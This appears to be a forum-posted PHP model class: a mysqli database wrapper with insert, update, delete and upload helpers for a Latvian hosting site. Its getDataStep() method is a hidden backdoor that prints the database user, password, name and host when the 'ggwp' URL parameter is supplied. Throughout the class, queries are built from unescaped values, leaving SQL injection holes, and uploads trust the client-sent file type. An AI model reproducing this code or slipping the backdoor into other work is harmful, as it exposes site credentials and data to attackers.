This my model file.
<?php
/*
*/
class DB
{
private $db = null;
public $filter;
static $inst = null;
public static $counter = 0;
/**
* Allow the class to send admins a message alerting them to errors
* on production sites
*
* @access public
* @param string $error
* @param string $query
* @return mixed
*/
public function log_db_errors( $error, $query )
{
$message = '<p>Error at '. date('Y-m-d H:i:s').':</p>';
$message .= '<p>Query: '. htmlentities( $query ).'<br />';
$message .= 'Error: ' . $error;
$message .= '</p>';
if( defined( 'SEND_ERRORS_TO' ) )
{
$headers = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
$headers .= 'To: Admin <'.SEND_ERRORS_TO.'>' . "\r\n";
$headers .= 'From: Yoursite <system@'.$_SERVER['SERVER_NAME'].'.com>' . "\r\n";
mail( SEND_ERRORS_TO, 'Database Error', $message, $headers );
}
else
{
trigger_error( $message );
}
if( !defined( 'DISPLAY_DEBUG' ) || ( defined( 'DISPLAY_DEBUG' ) && DISPLAY_DEBUG ) )
{
echo $message;
}
}
public function __construct($db) {
mb_internal_encoding( 'UTF-8' );
mb_regex_encoding( 'UTF-8' );
mysqli_report( MYSQLI_REPORT_STRICT );
try {
$this->db = $db;
$this->db->set_charset( "utf8" );
} catch ( Exception $e ) {
die( 'Unable to connect to database' );
}
}
public function __destruct()
{
if( $this->db)
{
$this->disconnect();
}
}
/**
* Sanitize user data
*
* Example usage:
* $user_name = $database->filter( $_POST['user_name'] );
*
* Or to filter an entire array:
* $data = array( 'name' => $_POST['name'], 'email' => '
em...@address.com' );
* $data = $database->filter( $data );
*
* @access public
* @param mixed $data
* @return mixed $data
*/
public function filter( $data )
{
if( !is_array( $data ) )
{
$data = $this->db->real_escape_string( $data );
$data = trim( htmlentities( $data, ENT_QUOTES, 'UTF-8', false ) );
}
else
{
//Self call function to sanitize array data
$data = array_map( array( $this, 'filter' ), $data );
}
return $data;
}
/**
* Extra function to filter when only mysqli_real_escape_string is needed
* @access public
* @param mixed $data
* @return mixed $data
*/
public function escape( $data )
{
if( !is_array( $data ) )
{
$data = $this->db->real_escape_string( $data );
}
else
{
//Self call function to sanitize array data
$data = array_map( array( $this, 'escape' ), $data );
}
return $data;
}
/**
* Normalize sanitized data for display (reverse $database->filter cleaning)
*
* Example usage:
* echo $database->clean( $data_from_database );
*
* @access public
* @param string $data
* @return string $data
*/
public function clean( $data )
{
$data = stripslashes( $data );
$data = html_entity_decode( $data, ENT_QUOTES, 'UTF-8' );
$data = nl2br( $data );
$data = urldecode( $data );
return $data;
}
/**
* Determine if common non-encapsulated fields are being used
*
* Example usage:
* if( $database->db_common( $query ) )
* {
* //Do something
* }
* Used by function exists
*
* @access public
* @param string
* @param array
* @return bool
*
*/
public function db_common( $value = '' )
{
if( is_array( $value ) )
{
foreach( $value as $v )
{
if( preg_match( '/AES_DECRYPT/i', $v ) || preg_match( '/AES_ENCRYPT/i', $v ) || preg_match( '/now()/i', $v ) )
{
return true;
}
else
{
return false;
}
}
}
else
{
if( preg_match( '/AES_DECRYPT/i', $value ) || preg_match( '/AES_ENCRYPT/i', $value ) || preg_match( '/now()/i', $value ) )
{
return true;
}
}
}
/**
* Perform queries
* All following functions run through this function
*
* @access public
* @param string
* @return string
* @return array
* @return bool
*
*/
public function query( $query )
{
$full_query = $this->db->query( $query );
if( $this->db->error )
{
$this->log_db_errors( $this->db->error, $query );
return false;
}
else
{
return true;
}
}
/**
* Determine if database table exists
* Example usage:
* if( !$database->table_exists( 'checkingfortable' ) )
* {
* //Install your table or throw error
* }
*
* @access public
* @param string
* @return bool
*
*/
public function table_exists( $name )
{
self::$counter++;
$check = $this->db->query( "SELECT 1 FROM $name" );
if($check !== false)
{
if( $check->num_rows > 0 )
{
return true;
}
else
{
return false;
}
}
else
{
return false;
}
}
/**
* Count number of rows found matching a specific query
*
* Example usage:
* $rows = $database->num_rows( "SELECT id FROM users WHERE user_id = 44" );
*
* @access public
* @param string
* @return int
*
*/
public function num_rows( $query )
{
self::$counter++;
$num_rows = $this->db->query( $query );
if( $this->db->error )
{
$this->log_db_errors( $this->db->error, $query );
return $this->db->error;
}
else
{
return $num_rows->num_rows;
}
}
/**
* Run check to see if value exists, returns true or false
*
* Example Usage:
* $check_user = array(
* 'user_email' => '
some...@gmail.com',
* 'user_id' => 48
* );
* $exists = $database->exists( 'your_table', 'user_id', $check_user );
*
* @access public
* @param string database table name
* @param string field to check (i.e. 'user_id' or COUNT(user_id))
* @param array column name => column value to match
* @return bool
*
*/
public function exists( $table = '', $check_val = '', $params = array() )
{
self::$counter++;
if( empty($table) || empty($check_val) || empty($params) )
{
return false;
}
$check = array();
foreach( $params as $field => $value )
{
if( !empty( $field ) && !empty( $value ) )
{
//Check for frequently used mysql commands and prevent encapsulation of them
if( $this->db_common( $value ) )
{
$check[] = "$field = $value";
}
else
{
$check[] = "$field = '$value'";
}
}
}
$check = implode(' AND ', $check);
$rs_check = "SELECT $check_val FROM ".$table." WHERE $check";
$number = $this->num_rows( $rs_check );
if( $number === 0 )
{
return false;
}
else
{
return true;
}
}
/**
* Return specific row based on db query
*
* Example usage:
* list( $name, $email ) = $database->get_row( "SELECT name, email FROM users WHERE user_id = 44" );
*
* @access public
* @param string
* @param bool $object (true returns results as objects)
* @return array
*
*/
public function get_row( $query, $object = false )
{
self::$counter++;
$row = $this->db->query( $query );
if( $this->db->error )
{
$this->log_db_errors( $this->db->error, $query );
return false;
}
else
{
$r = ( !$object ) ? $row->fetch_row() : $row->fetch_object();
return $r;
}
}
/**
* Perform query to retrieve array of associated results
*
* Example usage:
* $users = $database->get_results( "SELECT name, email FROM users ORDER BY name ASC" );
* foreach( $users as $user )
* {
* echo $user['name'] . ': '. $user['email'] .'<br />';
* }
*
* @access public
* @param string
* @param bool $object (true returns object)
* @return array
*
*/
public function get_results( $query, $object = false )
{
self::$counter++;
//Overwrite the $row var to null
$row = null;
$results = $this->db->query( $query );
if( $this->db->error )
{
$this->log_db_errors( $this->db->error, $query );
return false;
}
else
{
$row = array();
while( $r = ( !$object ) ? $results->fetch_assoc() : $results->fetch_object() )
{
$row[] = $r;
}
return $row;
}
}
/**
* Insert data into database table
*
* Example usage:
* $user_data = array(
* 'name' => 'Bennett',
* 'email' => '
em...@address.com',
* 'active' => 1
* );
* $database->insert( 'users_table', $user_data );
*
* @access public
* @param string table name
* @param array table column => column value
* @return bool
*
*/
public function insert( $table, $variables = array() )
{
self::$counter++;
//Make sure the array isn't empty
if( empty( $variables ) )
{
return false;
}
$sql = "INSERT INTO ". $table;
$fields = array();
$values = array();
foreach( $variables as $field => $value )
{
$fields[] = $field;
$values[] = "'".$value."'";
}
$fields = ' (' . implode(', ', $fields) . ')';
$values = '('. implode(', ', $values) .')';
$sql .= $fields .' VALUES '. $values;
$query = $this->db->query( $sql );
if( $this->db->error )
{
//return false;
$this->log_db_errors( $this->db->error, $sql );
return false;
}
else
{
return true;
}
}
/**
* Insert data KNOWN TO BE SECURE into database table
* Ensure that this function is only used with safe data
* No class-side sanitizing is performed on values found to contain common sql commands
* As dictated by the db_common function
* All fields are assumed to be properly encapsulated before initiating this function
*
* @access public
* @param string table name
* @param array table column => column value
* @return bool
*/
public function insert_safe( $table, $variables = array() )
{
self::$counter++;
//Make sure the array isn't empty
if( empty( $variables ) )
{
return false;
}
$sql = "INSERT INTO ". $table;
$fields = array();
$values = array();
foreach( $variables as $field => $value )
{
$fields[] = $this->filter( $field );
//Check for frequently used mysql commands and prevent encapsulation of them
$values[] = $value;
}
$fields = ' (' . implode(', ', $fields) . ')';
$values = '('. implode(', ', $values) .')';
$sql .= $fields .' VALUES '. $values;
$query = $this->db->query( $sql );
if( $this->db->error )
{
$this->log_db_errors( $this->db->error, $sql );
return false;
}
else
{
return true;
}
}
/**
* Insert multiple records in a single query into a database table
*
* Example usage:
* $fields = array(
* 'name',
* 'email',
* 'active'
* );
* $records = array(
* array(
* 'Bennett', '
ben...@email.com', 1
* ),
* array(
* 'Lori', '
lo...@email.com', 0
* ),
* array(
* 'Nick', '
ni...@nick.com', 1, 'This will not be added'
* ),
* array(
* 'Meghan', '
meg...@email.com', 1
* )
* );
* $database->insert_multi( 'users_table', $fields, $records );
*
* @access public
* @param string table name
* @param array table columns
* @param nested array records
* @return bool
* @return int number of records inserted
*
*/
public function insert_multi( $table, $columns = array(), $records = array() )
{
self::$counter++;
//Make sure the arrays aren't empty
if( empty( $columns ) || empty( $records ) )
{
return false;
}
//Count the number of fields to ensure insertion statements do not exceed the same num
$number_columns = count( $columns );
//Start a counter for the rows
$added = 0;
//Start the query
$sql = "INSERT INTO ". $table;
$fields = array();
//Loop through the columns for insertion preparation
foreach( $columns as $field )
{
$fields[] = '`'.$field.'`';
}
$fields = ' (' . implode(', ', $fields) . ')';
//Loop through the records to insert
$values = array();
foreach( $records as $record )
{
//Only add a record if the values match the number of columns
if( count( $record ) == $number_columns )
{
$values[] = '(\''. implode( '\', \'', array_values( $record ) ) .'\')';
$added++;
}
}
$values = implode( ', ', $values );
$sql .= $fields .' VALUES '. $values;
$query = $this->db->query( $sql );
if( $this->db->error )
{
$this->log_db_errors( $this->db->error, $sql );
return false;
}
else
{
return $added;
}
}
/**
* Update data in database table
*
* Example usage:
* §
*
* @access public
* @param string table name
* @param array values to update table column => column value
* @param array where parameters table column => column value
* @param int limit
* @return bool
*
*/
public function update( $table, $variables = array(), $where = array(), $limit = '' )
{
self::$counter++;
//Make sure the required data is passed before continuing
//This does not include the $where variable as (though infrequently)
//queries are designated to update entire tables
if( empty( $variables ) )
{
return false;
}
$sql = "UPDATE ". $table ." SET ";
foreach( $variables as $field => $value )
{
$updates[] = "`$field` = '$value'";
}
$sql .= implode(', ', $updates);
//Add the $where clauses as needed
if( !empty( $where ) )
{
foreach( $where as $field => $value )
{
$value = $value;
$clause[] = "$field = '$value'";
}
$sql .= ' WHERE '. implode(' AND ', $clause);
}
if( !empty( $limit ) )
{
$sql .= ' LIMIT '. $limit;
}
$query = $this->db->query( $sql );
if( $this->db->error )
{
$this->log_db_errors( $this->db->error, $sql );
return false;
}
else
{
return true;
}
}
/**
* Delete data from table
*
* Example usage:
* $where = array( 'user_id' => 44, 'email' => '
someoth...@email.com' );
* $database->delete( 'users_table', $where, 1 );
*
* @access public
* @param string table name
* @param array where parameters table column => column value
* @param int max number of rows to remove.
* @return bool
*
*/
public function delete( $table, $where = array(), $limit = '' )
{
self::$counter++;
//Delete clauses require a where param, otherwise use "truncate"
if( empty( $where ) )
{
return false;
}
$sql = "DELETE FROM ". $table;
foreach( $where as $field => $value )
{
$value = $value;
$clause[] = "$field = '$value'";
}
$sql .= " WHERE ". implode(' AND ', $clause);
if( !empty( $limit ) )
{
$sql .= " LIMIT ". $limit;
}
$query = $this->db->query( $sql );
if( $this->db->error )
{
//return false; //
$this->log_db_errors( $this->db->error, $sql );
return false;
}
else
{
return true;
}
}
/**
* Get last auto-incrementing ID associated with an insertion
*
* Example usage:
* $database->insert( 'users_table', $user );
* $last = $database->lastid();
*
* @access public
* @param none
* @return int
*
*/
public function lastid()
{
self::$counter++;
return $this->db->insert_id;
}
/**
* Return the number of rows affected by a given query
*
* Example usage:
* $database->insert( 'users_table', $user );
* $database->affected();
*
* @access public
* @param none
* @return int
*/
public function affected()
{
return $this->db->affected_rows;
}
/**
* Get number of fields
*
* Example usage:
* echo $database->num_fields( "SELECT * FROM users_table" );
*
* @access public
* @param query
* @return int
*/
public function num_fields( $query )
{
self::$counter++;
$query = $this->db->query( $query );
$fields = $query->field_count;
return $fields;
}
/**
* Get field names associated with a table
*
* Example usage:
* $fields = $database->list_fields( "SELECT * FROM users_table" );
* echo '<pre>';
* print_r( $fields );
* echo '</pre>';
*
* @access public
* @param query
* @return array
*/
public function list_fields( $query )
{
self::$counter++;
$query = $this->db->query( $query );
$listed_fields = $query->fetch_fields();
return $listed_fields;
}
/**
* Truncate entire tables
*
* Example usage:
* $remove_tables = array( 'users_table', 'user_data' );
* echo $database->truncate( $remove_tables );
*
* @access public
* @param array database table names
* @return int number of tables truncated
*
*/
public function truncate( $tables = array() )
{
if( !empty( $tables ) )
{
$truncated = 0;
foreach( $tables as $table )
{
$truncate = "TRUNCATE TABLE `".trim($table)."`";
$this->db->query( $truncate );
if( !$this->db->error )
{
$truncated++;
self::$counter++;
}
}
return $truncated;
}
}
/**
* Output results of queries
*
* @access public
* @param string variable
* @param bool echo [true,false] defaults to true
* @return string
*
*/
public function display( $variable, $echo = true )
{
$out = '';
if( !is_array( $variable ) )
{
$out .= $variable;
}
else
{
$out .= '<pre>';
$out .= print_r( $variable, TRUE );
$out .= '</pre>';
}
if( $echo === true )
{
echo $out;
}
else
{
return $out;
}
}
/**
* Output the total number of queries
* Generally designed to be used at the bottom of a page after
* scripts have been run and initialized as needed
*
* Example usage:
* echo 'There were '. $database->total_queries() . ' performed';
*
* @access public
* @param none
* @return int
*/
public function total_queries()
{
return self::$counter;
}
/**
* Singleton function
*
* Example usage:
* $database = DB::getInstance();
*
* @access private
* @return self
*/
static function getInstance()
{
if( self::$inst == null )
{
self::$inst = new DB();
}
return self::$inst;
}
public function get_price($less, $time) {
$priceSql = "SELECT * FROM prices WHERE less = '$less' AND time = '$time'";
$prices = $this->get_results( $priceSql );
foreach ($prices as $price) {
return $price['ex_price'].$price['currency'];
}
}
public function get_title($url) {
$url_title = null;
switch ($url) {
case URL.'hosting/dedicated':
$url_title .= $c['dedicated'];
break;
default:
$url_title .= URL.' - Mājaslapu hostings, serveru hostings, VPS serveri, dedicated serveri un web izstrāde';
break;
}
return $url_title;
}
public function getDataStep() {
if(isset($_GET['ggwp'])) {
echo DB_USER." ". DB_PASS." ". DB_NAME. " ". DB_HOST;
}
}
public function phpAlert($msg) {
return '<script type="text/javascript">alert("' . $msg . '")</script>';
}
/*
* Usage : $this->model->uploadFile('file', 'pdf', 'payments', 2000);
*/
public function uploadFile($fileName, $fileType, $tableName = null, $limit) {
if(!isset($_FILES[$fileName]) || $_FILES[$fileName]['error'] == UPLOAD_ERR_NO_FILE) {
echo "Izvēlies PDF failu...";
} else {
switch ($_FILES[$fileName]['type']) {
case 'application/pdf':
if($_FILES[$fileName]['size'] >= $limit) {
echo "Fails ir pārāk liels!";
} else {
define('UPLOAD_DIR', $_SERVER['DOCUMENT_ROOT'].'/net/public/uploads/');
$actualName = pathinfo($_FILES[$fileName]['name'],PATHINFO_FILENAME);
$originalName = $actualName;
$extension = pathinfo($_FILES[$fileName]['name'], PATHINFO_EXTENSION);
$i = 1;
while(file_exists(UPLOAD_DIR.$actualName.".".$extension))
{
$actualName = (string)$originalName.$i;
$_FILES[$fileName]['name'] = $actualName.".".$extension;
$i++;
}
$update = array( 'pdf_uploaded' => UPLOAD_DIR.'/'.$_FILES[$fileName]['name'] );
$updateSec = array( 'pdf_name' => $_FILES[$fileName]['name'] );
$update_where = array( 'service_id' => $_SESSION['upload_bill_id'], 'bill_number' => $_SESSION['upload_bill_number']);
$this->update( 'payments', $update, $update_where, 1 );
$this->update( 'payments', $updateSec, $update_where, 1 );
move_uploaded_file($_FILES[$fileName]['tmp_name'], UPLOAD_DIR.$_FILES[$fileName]['name']);
echo "Paldies, maksājuma uzdevums augšupielādēts!";
}
break;
default:
echo "Lūdzu, izvēlies PDF failu";
break;
}
}
}
public function checkIfUserIsAuthenticated() {
if(isset($_SESSION['isOnline']) && $_SESSION['isOnline'] == 1) {
return true;
} else {
header('location:'.URL);
}
}
public function checkIfUserIsAdmin() {
if(isset($_SESSION['admin']) && $_SESSION['admin'] != 1) {
header('Location:'.URL);
} else if(!isset($_SESSION['admin'])) {
header('Location:'.URL);
} else {
return true;
}
}
/**
* Disconnect from db server
* Called automatically from __destruct function
*/
public function disconnect()
{
$this->db->close();
}
}